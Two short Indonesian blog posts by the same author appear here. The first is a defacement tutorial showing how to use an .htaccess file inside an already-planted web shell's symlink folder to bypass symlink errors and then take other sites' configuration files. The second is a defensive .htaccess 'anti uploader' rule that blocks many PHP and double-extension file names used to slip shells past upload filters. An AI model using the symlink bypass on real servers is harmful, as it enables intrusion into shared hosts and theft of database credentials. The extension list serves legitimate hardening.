Naufal Ardhani - Hello pren pren sekalian :v kali ini saya bakal share
Cara Bypass Symlink dengan .htaccess .... hmm saya tau nih kalian liat artikel ini karna target deface kalian symlinknya error kan? :'v oke kalem aja karena saya ada solusinya wkwk, langsung aja dibawah yaa...
BAHAN :
- Script .htaccess
- Shell ( saya sih pake shell noname xai / shell apa aja Yang Ada Symlinknya )
- Target Web yang sudah tertanam shell dan ada symlink
Script .htaccess
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
Step
- Buka Shell di web yang ada symlinknya ( terdapat gambar shell noname )
- Lalu Klik Symlink ( dan redirect ke page symlink )
Pilih Salah satu web abis tu klik symlink di kanan domain
Jika error seperti itu jangan panik kalem aja :v
Silahkan edit script .htaccess dengan script yang diatas tadi di folder /sym/ dan kalau sudah edit di save
sudah tidak error lagi kan? tapi yang digambar hanya ada cgi-bin/ :v cuma sekedar pembelajaran aja ya
dan sudah berhasil :) terlihat Index of .......
langsung kalian sikat aja confignya untuk tutorial lebih lanjut silahkan cek blog ini
Sekian Cara Bypass Symlink dengaan .htaccess
Naufal Ardhani - Hello kali ini saya bakal membagikan code anti Access Uploader yang biasanya untuk menutup akses bagi para defacer yang ingin mengdeface web tertentu, .htaccess ini sangat berguna bagi para web developer yang ingin web keamanannya terjaga, dengan ini jika sang hacker ingin mengupload shell backdoor tidak akan bisa walaupun mencoba bypass extnya.
#BEGIN ANTI UPLOADER
<FilesMatch "\.(php|php.J|PHP|PhP|php1|php2|php3|PHP3|PhP3|php4|php5|PHP5|PhP5|php6|php7|php8|php9|phtml|PHTML|aspx|ASPX|asp|ASP|php.jpg|PHP.JPG|php.xxxjpg|PHP.XXXJPG|php.jpeg|PHP.JPG|PHP.JPEG|PHP.PJEPG|php.pjpeg|php.fla|PHP.FLA|php.png|PHP.PNG|php.gif|PHP.GIF|php.test|php;.jpg|PHP JPG|PHP;.JPG|php;.jpeg|php jpg|php.bak|php.pdf|php.xxxpdf|php.xxxpng|php.xxxgif|php.xxxpjpeg|php.xxxjpeg|php3.xxxjpeg|php3.xxxjpg|php5.xxxjpg|php3.pjpeg|php5.pjpeg|shtml|php.unknown|php.doc|php.docx|php.pdf|php.ppdf|jpg.PhP|php.txt|php.xxxtxt|PHP.TXT|PHP.XXXTXT|php.xlsx|php.zip|php.xxxzip)$">
Order Allow,Deny
Deny from all
</FilesMatch>
#END ANTI UPLOADER
[+]Author : Naufal Ardhani
[+]Sumber Code : www.pixel-code.ga
[+]Step pemasangan
[1]Save kode diatas dengan nama .htaccess
[2]Upload, Taruh htaccess di folder tujuan uploader (jangan asal pasang)
[3]Done
[~]Pasangnya jangan di directory yang ada format .php / .phtml / .php1 - .php7 (liat sendiri aja ekstensinya :v )
